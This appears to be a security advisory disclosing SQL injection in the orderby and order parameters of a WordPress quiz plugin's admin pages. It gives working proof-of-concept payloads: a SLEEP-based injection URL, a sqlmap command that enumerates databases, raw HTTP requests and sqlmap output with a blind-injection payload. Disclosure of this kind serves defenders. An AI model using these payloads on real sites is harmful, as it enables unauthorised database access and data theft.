The plugin did not properly sanitise and escape the order and orderby parameters before using them in SQL statements, leading to SQL injection issues in the admin dashboard When we (WPScanTeam) confirmed the issues, more SQL Injections were identified, reported and fixed by the vendor but have not been detailed here.
All the files in includes/lists/ were affected and the PoC below are just examples of them
https://example.com/wp-admin/admin.php?page=quiz-maker-question-categories&orderby=title%20AND%20(SELECT%206418%20FROM%20(SELECT(SLEEP(5)))PLuH)&order=asc
SQLMAP: python sqlmap.py -r r.txt -p orderby --level 5 --risk 3 --dbms MySQL --technique B --dbs
With r.txt is GET OR POST requests to sort quiz:
GET /wp-admin/admin.php?page=quiz-maker&orderby=id--&order=desc HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1
OR :
POST /wp-admin/admin.php?page=quiz-maker HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
Connection: close
Cookie: [admin+]
orderby=id--&order=desc&s=d&action=-1&paged=1&filterby-top=&action2=-1&filterby-bottom=
SQLMAP OUTPUT:
---
Parameter: orderby (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: page=quiz-maker&orderby=(SELECT (CASE WHEN (5750=5750) THEN 0x7469746c65 ELSE (SELECT 1570 UNION SELECT 3396) END))&order=asc
---
[22:38:25] [INFO] testing MySQL
[22:38:25] [INFO] confirming MySQL
[22:38:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 8.0.0